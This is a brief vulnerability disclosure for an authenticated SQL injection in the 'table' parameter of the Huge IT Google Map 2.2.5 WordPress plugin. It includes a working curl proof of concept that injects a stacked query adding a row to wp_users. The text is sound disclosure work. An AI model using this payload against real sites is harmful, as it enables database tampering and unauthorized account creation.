Hello,

Plugin: Huge IT Google Map 2.2.5 (https://wordpress.org/plugins/google-map-wp/)

Remote authenticated users can execute arbitrary SQL commands.

1. SQL injection (g_map_options_callback())

Method: POST

Url: http://localhost/wp-admin/admin-ajax.php?action=g_map_options

Vulnerable parameter: table

Example PHP callstack:

g_map_options_callback   [/google-map-wp/googlemap.php:487]

wpdb::query

Verification (inserting new user into database):

curl --cookie "..." --request POST --data "table=posts where id=-1; insert into wp_users values(NULL,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a);-- -" http://localhost/wp-admin/admin-ajax.php?action=g_map_options